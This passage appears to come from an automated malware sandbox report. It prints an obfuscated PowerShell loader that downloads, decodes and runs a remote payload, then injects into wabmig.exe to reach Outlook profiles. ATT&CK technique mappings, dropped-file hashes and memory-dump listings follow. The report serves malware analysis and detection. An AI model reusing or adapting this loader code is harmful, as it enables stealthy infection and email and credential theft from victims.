DDraymiRi.eraStigrmSyrphaAmphonAnalptPredesRekurlMiddoiMa erbOverfe Frabr DyngeOffenn oatsHy op=Admin$ PrehELaegeiSambec Ov,rhZoantm G,vea DagdnInt rn Uvae.Valses UninpTomenlcamasiU,fortProcr( Wolf$LucifL robeFl rigS igraSnigslMonopiBrammtOrcane I crt chemsSlippsAurifpSilksrLimsigDen.astisanm endia OmegaNonpllBru es Nobl7Alleh5Badmi)Fruit ');Genoptagende (Sprattles 'R ens[,nsavN Homee U antEirk,.AquacSVendae igenrdo mfvWhimbiO ernc bitseUnd cPAcacao iddi bedrn E,netTropaMHoundaU wein ClifaWestegRhagie UnderWinne] Synt: illa:InforSGy aseTalepcVr.nguSubporParadiEle,atbureayRaaskPAmorarT nkroUdbrat AnkeoIndstcOverfoEn opl Bort Decor= A er Unbla[Fi miNSpgelefremktSessi.G tesS ,kyee Titoc Sa,luGodtrrMlkeri krdtDelfuyMaalfP trirSl dfoNonamtBirdno RaascborraoVidtllTralvT Undeyfora pAedeaeSu de] A am: Ce t:MusisTLongwlRaastsFerti1Texas2Born ');$Eichmann=$Diamantsliberens[0];$Glossata= (Sprattles ' ,ste$Over GCu arLFumisoHusmoBDyrp aMajusl.oren:O,erkdAlbesEFagliaForsvtOutslH Indeb Taksl GenaoTrikowTendeS Poes=,nparnWindbeUnannwM ter- M sloSneglBRes,oJVirksEBru.eCfloreTForho S aags injeyFo lassto,kTlejlieHolm m nsol.R,nden galleRu det nonu.TsemiWFormae ReoxbTj nsCPr colBungoiTonkpE DyreND lenT');$Glossata+=$Teetotal[1];Genoptagende ($Glossata);Genoptagende (Sprattles 'Regnf$ EuguDHeroieOrthoaDyngvt ivnihBoligbBe orlS nyao Rod,wBehansCigar. IdemHKo poeFunktafilbedReside .ublr O,ersBipro[deduc$CivilSTagenuTrichbHaemaddiaseeHjerna Frogc Whi.oPulc nTaransstrafhM usei Ko gpGrund] Stic=R.tsk$BrokraChec.lsodalb Cor,iBa intBathuiTempecHadefaHjkonl Gerv ');$Treaaring=Sprattles 'Celto$ ncorDWoodweSamieaLat gtForivhConfeb DriflomerroIchthw FlygsKuppe. FormDHavneoSli hw Paran entalUnpunoKlagea AkkodNon iFSmarti AflglEmmy.eSveri(Teori$ UndeEstedmi esamcFlde hHe tumChhatasilben Bea,n ygge,Thems$ vildcMyel.oTristcKreprkbrystt Parea FliniMord lverdikSekunjmas,loF emslBom,neMungrrAntivn GlomeEmasc)Agrim ';$cocktailkjolerne=$Teetotal[0];Genoptagende (Sprattles 'Alter$Orieng FenblLodgeo R.crbE,vinatraguL Musi:AmenafSnedsOdramarSlopeFPerilJ RygsEdupliDKa kue U vi=Skyde(Gran,TPrioreNeuroSDksmaTEnsph-Fo.klPIndenA Stirt Dim h ,esw Tra s$Spildc KiddoFodsvC V ljkTu,tiTTe tpASygepi Usu LRoskikNiendJBord OFreebLC,tateisfahrEjernNPigweEPre,r).esky ');while (!$Forfjede) {Genoptagende (Sprattles 'Volit$Tordiga,fiblSmag,o FoedbCicadaMoi elAltsa:furcafLoc loSammerKlo egHatterAfsmii Reglm ockim,anneeUdhal=Verno$ Taart P ocr BermuVej.eeConut ') ;Genoptagende $Treaaring;Genoptagende (Sprattles 'Adre SEpitytTreh aPro erAalent Sttt- LigeSVareflGeniteSupere TakopPe on f rho4Musti ');Genoptagende (Sprattles 'Moise$Skre g P adl Kerno Rebub GeniaPustelFu.ur:KolpoFguitaoHirserSeijafPubl.jOverbe plo dSnu beBronk=Glott(astomT SpdleMultisHovnetLiths-MccanPSkrivaSamfutSlumah Dris husk$TutticOut.hoNonsucCivilk Arnut Conta T kniFilmalArchik wis j mervoS erllScru ekalcirArsenn UngreDelmo)Rnner ') ;Genoptagende (Sprattles ' Krig$Ubes g,bomalBor.soCarribStonea VirglFalle: Pne,SHelteoAfbagnOasisgSulphfReachuTaalelSn splJenbrymoon = Fora$Prefig AuxilMu tioCaptabSkvataOrganlNavne:AlexiOPatriu FersvPiarreMeasurSa,frtKundeu Phanr,ndoteRaast+Folke+Onych%Uskad$SokolDTerroiGas,eaObl,gm Un iaban,unKontrtStrygs OplalLochyiEcstabMfin.ePersorRetleeProt,nBaneosPh co.wagonc UnstoSkagbuMonotn PeritRouti ') ;$Eichmann=$Diamantsliberens[$Songfully];}$Propagandised=309145;$Heksejagts=29424;Genoptagende (Sprattles 'Ortho$Fratrg ealelVolatoT uxybSprk,a Krool dlan:A genF W eloParaprU deracollonA,tagd statrSmelliObs rnD fibgAccelsAlbats Spi.tAffejn Selvi Specn.ugerg MyrieSpaghrT igonT etaePetti Besky= Pri SvireGSlgtse efitFront-a terCTrochotheron Coact Bittein.icn AllotSl,ds Hand.$ SlavcCessiodock c Lo mkKravet.emapaSulphiTole lFuglekTilv jVi kso andvlRelige inesrColounFlak e Enga ');Genoptagende (Sprattles 'Orexi$Ve dbg Privl ompioLem.ebKli paGero lsnirk: Bu eT B.ggaPebernmilligtalleeDam snDi ectFos,eiGardenBar asFaraotDeltarFladlu R demCsiume rstenIndfrtaftvteh ldut E.stsShowr Dags=Debto Rysl[Slim SHnsejyRigsesSvaletPelareAf.rimUdenl.eft,rC ilskoDoct.nReadivGly.ieStolirProrettil.n]Tor r:Delet:,rotrFMit erBrikeoDamprm urkpB Lunaa UdsksT ynieAroin6Fakul4 WateSUnitat HertrPols.iFulvin,ubing mono(Conur$FryseFLe.tioWaxworBest.a SlevnKrysodGrandrStea iGradensyrengIdiogsSvendsPocostUndernReinfiF.milnGravigUltraeHypodrAntionBrud.e ema) S,rg ');Genoptagende (Sprattles 'F.ugt$Robomgu betlBissaoHjertbSikahaThy.ulLyd.s:MorayK ,ongeAntirdSforzdheaveaNoedvh S,orsHomol Epibi=Bords Vill [z braSUntakyhamstsKorontDe ece Hol mRepos.KoyemTCarmeeU astxAlfaltAntis.StorkEYangtn s recVaporobankhdraaddiCloggnIn.eggStbes] Embr:Udsty:WhiskAFotokS MiscCMenfoIUnsatId spr.FayetGk lone ustt a riSRestatPl murUnsediHimmen almagCafe ( duce$ jiggT Enc aOsteon PolygOysteeTe.tenDuststOverrisaltwnGenops Ca.tt KanfrRbareuDesigmUnc,geInternveikktExam.eing,ntPatrisaande)Sheat ');Genoptagende (Sprattles 'Agpai$AmblygPacedlStoploGangabpakkeaTamtalBakni:DigreWMagnehJakaryGgemaoUnci,=R,stu$ Pe iK TriteMglindSpidsdO.sliaUnv ghEmbolsCompi.orangs vertu UndebErhv sphaent sygerGerbiiDekodn rinsg.onoe(Helio$An,ekPBro krTri socomp pdosimaSkralgec.ocaHypopnAcculdSa.dbi ndefsHjesteOp jedudlbe,forto$CohabH SamaeCompikJournsEmboneAf,etjForfaaF.ancgSprget tulusInves)C.tca ');Genoptagende $Whyo;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kommuneplanlgningers.Per && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2616
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P3WWTD8EL3DARG64XQGP.temp

Filesize
7KB

MD5
e4f4b801d8d8aaec1a2f9076d3d20903

SHA1
423277a8215772654ad05512012fdab68fd84a68

SHA256
fb5aa5fa49c2397dbc7f6cad2c57bde5c0f70d080433789207bd31946d737698

SHA512
d5b3acb21d3c97a8f9b0e9f4e6172b387a89ffb2b852658b678e028bd558d3620fd314758c2d1927dfffb0821f7785e7ba39b79fd87f4e3f067ed397bfda7e61

Download Submit
C:\Users\Admin\AppData\Roaming\kommuneplanlgningers.Per

Filesize
440KB

MD5
376fea8253125b7c6338c7cdb73f4539

SHA1
c1d834a5b261d50c2bbfd9ae0ca602ca5842357a

SHA256
da5bc6c6e3ac84f417dc8ab51e5cbcc8b6467f8847af5eb607746ee754207701

SHA512
3ee30351373299e6c97967b69c109edc233ac731d88df9429c72a392792b35c7730b108efd044dde8e65eca6ba116f1e38b03163ffb2c0b647c9bbe426026f0d

Download Submit
memory/2100-42-0x0000000000CA0000-0x0000000003296000-memory.dmp

Filesize
38.0MB

Download
memory/2100-20-0x0000000000CA0000-0x0000000003296000-memory.dmp

Filesize
38.0MB

Download
memory/2268-13-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

Filesize
4KB

Download
memory/2268-11-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

Filesize
4KB

Download
memory/2268-14-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-10-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-7-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2268-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-43-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-6-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2584-19-0x00000000065B0000-0x0000000008BA6000-memory.dmp

Filesize
38.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads